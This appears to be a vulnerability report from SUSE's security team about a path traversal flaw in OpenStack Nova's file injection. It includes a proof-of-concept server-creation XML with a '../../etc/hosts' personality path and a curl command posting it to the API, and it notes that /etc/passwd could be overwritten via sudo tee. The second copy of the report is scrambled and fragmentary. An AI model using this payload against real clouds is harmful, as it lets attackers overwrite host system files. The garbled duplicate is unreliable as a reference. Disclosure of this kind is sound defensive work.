Mathias Weckbecker from SUSE Security Team reported the following:
------------------ During our internal security audit efforts at SUSE for openstack, I have found an issue in openstack-nova (compute).
Quoting from [1] (comment #1):
Vulnerable code (quoted), /usr/lib64/python2.6/site-packages/nova/utils.py: [... snipped copy of utils.execute code ...]
It's already doing lots of things correctly, like e.g. calling Popen with the first parameter being a list, still it is affected by traversal flaws.
Testcase (also from [1], comment #0):
mweckbecker@s3gfault:~$ cat newserver.xml <?xml version="1.0" encoding="UTF-8"?> <server xmlns="http://docs.openstack.org/compute/api/v1.1" imageRef="http://anonymi.arch.suse.de:8774/985b88ae99474d6d90501870499a063f/images/2d583dfb-000a-4332-9264-ed57ce186f1d" flavorRef="6" name="new-server-test"> <metadata> <meta key="My Server Name">foobar</meta> </metadata> <personality> <file path="../../../../../../../../../../../../../etc/hosts"> ICAgICAgDQoiQSBjbG91ZCBkb2VzIG5vdCBrbm93IHdoeSBp dCBtb3ZlcyBpbiBqdXN0IHN1Y2ggYSBkaXJlY3Rpb24gYW5k IGF0IHN1Y2ggYSBzcGVlZC4uLkl0IGZlZWxzIGFuIGltcHVs c2lvbi4uLnRoaXMgaXMgdGhlIHBsYWNlIHRvIGdvIG5vdy4g QnV0IHRoZSBza3kga25vd3MgdGhlIHJlYXNvbnMgYW5kIHRo ZSBwYXR0ZXJucyBiZWhpbmQgYWxsIGNsb3VkcywgYW5kIHlv dSB3aWxsIGtub3csIHRvbywgd2hlbiB5b3UgbGlmdCB5b3Vy c2VsZiBoaWdoIGVub3VnaCB0byBzZWUgYmV5b25kIGhvcml6 b25zLiINCg0KLVJpY2hhcmQgQmFjaA== </file> </personality> </server>
mweckbecker@s3gfault:~$ curl -v "http://anonymi.arch.suse.de:8774/v2/985b88ae99474d6d90501870499a063f/servers" -H"X-Auth-Token:ef7d5faf9d864c048afce0cf6a3a3c15" -H"Content-type:application/xml" -H"Accept:application/xml" -d @newserver.xml
Additional note: This beast is calling tee with sudo, potentially allowing attackers to even alter files such as /etc/passwd.
[1] https://bugzilla.novell.com/show_bug.cgi?id=767687
Thanks, Matthias
Mathias Weckbecker from SUSE Security Team reported the following:
------------------
During our internal security audit efforts at SUSE for openstack, I have found
an issue in openstack-nova (compute).
Quoting from [1] (comment #1):
Vulnerable code (quoted), /usr/lib64/ python2. 6/site- packages/ nova/utils. py:
[... snipped copy of utils.execute code ...]
It's already doing lots of things correctly, like e.g. calling Popen with
the first parameter being a list, still it is affected by traversal flaws.
Testcase (also from [1], comment #0):
mweckbecker@ s3gfault: ~$ cat newserver.xml docs.openstack. org/compute/ api/v1. 1" anonymi. arch.suse. de:8774/ 985b88ae99474d6 d90501870499a06 3f/images/ 2d583dfb- 000a-4332- 9264-ed57ce186f 1d"
flavorRef= "6"
name=" new-server- test"> ./../.. /../../ ../../. ./../.. /../../ ../etc/ hosts">
ICAgICAgDQoiQS BjbG91ZCBkb2VzI G5vdCBrbm93IHdo eSBp
dCBtb3ZlcyBpbi BqdXN0IHN1Y2ggY SBkaXJlY3Rpb24g YW5k
IGF0IHN1Y2ggYS BzcGVlZC4uLkl0I GZlZWxzIGFuIGlt cHVs
c2lvbi4uLnRoaX MgaXMgdGhlIHBsY WNlIHRvIGdvIG5v dy4g
QnV0IHRoZSBza3 kga25vd3MgdGhlI HJlYXNvbnMgYW5k IHRo
ZSBwYXR0ZXJucy BiZWhpbmQgYWxsI GNsb3VkcywgYW5k IHlv
dSB3aWxsIGtub3 csIHRvbywgd2hlb iB5b3UgbGlmdCB5 b3Vy
c2VsZiBoaWdoIG Vub3VnaCB0byBzZ WUgYmV5b25kIGhv cml6
b25zLiINCg0KLV JpY2hhcmQgQmFja A==
<?xml version="1.0" encoding="UTF-8"?>
<server xmlns="http://
imageRef="http://
<metadata>
<meta key="My Server Name">foobar</meta>
</metadata>
<personality>
<file path=".
</file>
</personality>
</server>
mweckbecker@ s3gfault: ~$ curl -v anonymi. arch.suse. de:8774/ v2/985b88ae9947 4d6d90501870499 a063f/servers" Token:ef7d5faf9 d864c048afce0cf 6a3a3c15" type:applicatio n/xml" -H"Accept: application/ xml" -d @newserver.xml
"http://
-H"X-Auth-
-H"Content-
Additional note: This beast is calling tee with sudo, potentially allowing
attackers to even alter files such as /etc/passwd.
[1] https:/ /bugzilla. novell. com/show_ bug.cgi? id=767687
Thanks, Matthias